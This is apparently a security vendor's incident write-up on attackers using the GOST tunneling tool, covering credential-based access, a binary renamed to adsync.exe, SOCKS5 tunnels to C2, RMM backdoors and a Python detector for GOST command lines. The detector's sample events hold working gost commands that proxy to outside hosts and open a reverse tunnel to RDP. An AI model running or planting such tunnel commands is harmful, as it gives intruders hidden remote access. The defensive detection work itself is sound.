Tunnel Vision: Threat Actors Using GOST in Real Attacks

Tunnel vision affects everyone in some shape or form. In the security industry it shows up in network layout and segmentation: concentrating on hardening one portion of the network can leave other subnets or VLANs lagging behind, and those are the segments an intruder ends up using.
As the saying goes, where there is a will there is a way. Threat actors are determined to reach their actions on objectives, and a key step in that kill chain is establishing reliable network communication with their Command and Control (C2) server. The Blackpoint SOC is observing increased use of Go Simple Tunnel (GOST) during breaches to tunnel and proxy traffic to the attacker's C2.
Key Findings
- Threat actors continue to use compromised credentials to access exposed services, including RD Web Access.
- Once inside the network, the adversary works on establishing a connection to their Command and Control (C2) server.
- Threat actors are leveraging open-source tools, including Go Simple Tunnel (GOST), to quickly tunnel and proxy traffic to their C2.
- After establishing the connection back to their C2, the threat actor attempts to escalate privileges before moving laterally.
- These open-source tunneling tools increase the speed and effectiveness of a threat actor inside the network.
What is Go Simple Tunnel (GOST)?
Go Simple Tunnel (GOST) is an open-source tunneling and proxy tool written in Go. Because it is open source, anyone, including threat actors, can pull, modify, and adapt it to their needs. Its core functions are proxying traffic (for example as a SOCKS5 or HTTP proxy), port forwarding, and reverse proxying or reverse tunneling, and it can chain connections through a further proxy hop. During a breach it is a convenient item in the toolbox that lets a threat actor port forward or proxy traffic out to their C2.
Utilization of this tool within breaches
The Blackpoint SOC recently responded to an incident in which a threat actor used GOST to tunnel out to two separate C2 servers. The threat actor gained initial access with a user's compromised credentials, which let them log in to RD Web Access and from there reach the Remote Desktop Services (RDS) server. Once on the RDS server, the threat actor downloaded GOST onto it.

Image 1 – Downloading of GOST onto RDS server
After downloading the tool onto the host, the threat actor moved it into C:\ProgramData and renamed the binary adsync.exe. That folder is hidden by default, so a typical user would not notice the file. The new name also masquerades as a legitimate Windows component (it resembles the ADSync service used by Azure AD Connect), a further attempt to blend in.

Image 2 – Renaming GOST to adsync.exe
Using the tool, the threat actor then set up tunnels to proxy traffic to their C2. The commands below show how they used GOST to create a SOCKS5 proxy and tunnel traffic out to the C2 over TCP.

Image 3 – Setting up SOCKS5 proxy and Tunneling out to C2
After establishing these tunnels, the threat actor attempted to escalate privileges with PrivEscCheck, an open-source PowerShell privilege escalation enumeration script that identifies misconfigurations an attacker could use to escalate. In this case the TA saved the script's contents as a .txt file. AMSI identified the content as soon as it was executed, and the file was quarantined.

Image 4 – Attempt to escalate privileges using PrivEscCheck
After failing to escalate privileges, the threat actor turned to mapping the network to see what the compromised account could reach. Every attempt failed except one: a user's workstation. Having identified that host, the threat actor executed remotely on it and then RDP'd in. Once on this newly compromised host, they immediately dropped GOST again and began tunneling out to the second C2 used in this intrusion. This time the threat actor created two malicious services, "adsync" and "dcsync", which again stood up a SOCKS5 proxy and tunneled traffic out to the second C2 over TCP.

Image 6 – Process Tree tied to TA tunneling out on newly compromised device
Further investigation found that the threat actor had also deployed both Atera and Splashtop on the newly compromised host. Both are Remote Monitoring and Management (RMM) tools, which threat actors install as backdoor access that survives the loss of their initial foothold.

Image 7 – Install of Atera and Splashtop
Within this short window, the Blackpoint SOC identified the initial access mechanism, isolated all affected devices, and worked with our partner to disable the compromised account. The short intervals between these events illustrate how quickly threat actors move once inside a network.
When one door is closed, they try the next. Tunneling is a critical technique in nearly every threat actor operation, and the ease of use GOST provides helps them move faster.
Tunneling and proxying of traffic are not going away any time soon. More tools like GOST will appear, and they will keep facilitating lateral movement during breaches. It is therefore critical to build detections that flag illegitimate tunneling activity, especially activity stemming from GOST, and to key those detections on behaviour rather than on a binary name, since the attacker in this case renamed the binary before ever running it.
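As an added example that is not part of the original post and is not Blackpoint's detection content or gost's own code, the Python below shows one way to flag GOST-style tunneling from Windows telemetry. It covers both the command-line shape discussed with Image 3 and the call for detections above: the rule matches the listener (`-L`) and forward-chain (`-F`) URL grammar gost takes on its command line, so it fires regardless of what the binary was renamed to, and it pulls out the last `-F` hop as the egress relay / C2 candidate. The event records, host names, IP addresses and service ImagePath values are constructed for the example, not logs from the incident described above, and the gost argument forms shown are generic gost usage, not the specific commands the threat actor ran.

```python
"""
Flag GOST-style tunnel/proxy launches in Windows process and service telemetry.

Added example (not Blackpoint's detection content, not gost's own code).
It matches the argument grammar gost uses on its command line:
    -L <scheme>://[host]:port[/target]   listener, port forward or reverse tunnel
    -F <scheme>://host:port              forward chain: the next hop, i.e. the relay / C2
so a renamed binary (adsync.exe, a "dcsync" service, ...) is still caught.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Schemes gost accepts in -L / -F URLs (shared by gost v2 and v3).
GOST_SCHEMES = ("socks5", "socks4", "http", "ss", "tcp", "udp", "rtcp", "rudp",
                "ws", "wss", "tls", "mtls", "kcp", "quic", "relay")
_URL = r"(?:%s)://[^\s\"']+" % "|".join(GOST_SCHEMES)
LISTEN_RE = re.compile(r"(?:^|\s)-L[= ]+(%s)" % _URL, re.I)        # -L=socks5://:1080 or -L socks5://:1080
BARE_LISTEN_RE = re.compile(r"(?:^|\s)-L[= ]+(:\d{1,5})(?=\s|$)")   # gost v2 shorthand: -L=:1080
FORWARD_RE = re.compile(r"(?:^|\s)-F[= ]+(%s)" % _URL, re.I)
REVERSE_SCHEMES = ("rtcp", "rudp")  # remote port forward: the next hop opens a listener pointing back in


@dataclass
class Alert:
    rule: str
    computer: str
    image: str
    listeners: list = field(default_factory=list)
    forward_hops: list = field(default_factory=list)
    next_hop_host: str = ""          # host of the last -F node: egress relay / C2 candidate
    service_name: str = ""           # set for Event ID 7045 service installs
    in_programdata: bool = False     # staging location seen in the incident above


def image_from_path(image_path):
    """First token of a service ImagePath, honouring a quoted path that contains spaces."""
    m = re.match(r'"([^"]+)"|(\S+)', image_path)
    return (m.group(1) or m.group(2)) if m else ""


def tunnel_args(cmdline):
    """Return (listeners, forward_hops) found in a command line; both empty if none."""
    listeners = LISTEN_RE.findall(cmdline) + BARE_LISTEN_RE.findall(cmdline)
    return listeners, FORWARD_RE.findall(cmdline)


def analyze(event):
    """Apply the rules to one event dict and return zero or more Alerts."""
    if event["event_id"] == 1:          # Sysmon process creation
        cmdline, image, service, rule = event["CommandLine"], event["Image"], "", "gost_tunnel_process"
    elif event["event_id"] == 7045:     # System log: service installed; ImagePath carries the arguments
        cmdline = event["ImagePath"]
        image, service, rule = image_from_path(cmdline), event["ServiceName"], "gost_tunnel_service"
    else:
        return []
    listeners, hops = tunnel_args(cmdline)
    if not listeners and not hops:
        return []                        # e.g. "ssh -L 8080:host:80" never carries a scheme
    common = dict(computer=event["Computer"], image=image, listeners=listeners, forward_hops=hops,
                  next_hop_host=(urlsplit(hops[-1]).hostname or "") if hops else "",
                  service_name=service, in_programdata=image.lower().startswith(r"c:\programdata"))
    alerts = [Alert(rule, **common)]
    if any(urlsplit(l).scheme.lower() in REVERSE_SCHEMES for l in listeners):
        alerts.append(Alert("gost_reverse_tunnel", **common))   # the C2 side can reach back into the network
    return alerts


def run(events):
    return [a for e in events for a in analyze(e)]


# Constructed sample records using Sysmon / System-log field names; not logs from the incident above.
SAMPLE_EVENTS = [
    {"event_id": 1, "Computer": "RDS01", "Image": r"C:\ProgramData\adsync.exe",
     "CommandLine": r"C:\ProgramData\adsync.exe -L=socks5://:1080 -F=socks5://203.0.113.10:1080"},
    {"event_id": 1, "Computer": "RDS01", "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe -L 8080:intranet:80 jdoe@jump"},          # benign: -L without a scheme
    {"event_id": 7045, "Computer": "WKSTN07", "ServiceName": "dcsync",
     "ImagePath": r"C:\ProgramData\adsync.exe -L rtcp://:2222/127.0.0.1:3389 -F socks5://198.51.100.7:1080"},
    {"event_id": 7045, "Computer": "WKSTN07", "ServiceName": "ADSync",  # legitimate Azure AD Connect service
     "ImagePath": r'"C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe"'},
]

if __name__ == "__main__":
    for a in run(SAMPLE_EVENTS):
        print(f"{a.rule:22} {a.computer:8} {a.image}  next_hop={a.next_hop_host or '-'} "
              f"service={a.service_name or '-'} listeners={a.listeners}")
```

The rule keys on argument grammar rather than on an image or service name precisely because the binary in this incident was renamed to adsync.exe and the services were given lookalike names; the genuine ADSync service record is included as a negative case, as is `ssh -L`, whose `-L` takes no URL scheme. A gost v3 run driven by a configuration file (its `-C` option) carries none of this on the command line, so pair the rule with file-creation and network telemetry: new executables in C:\ProgramData, and long-lived outbound TCP sessions to a single external host from a server that normally has none.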
Author: Nevan Beal, Sr. MDR Analyst
Date published: April 22, 2025
Published by: Blackpoint Cyber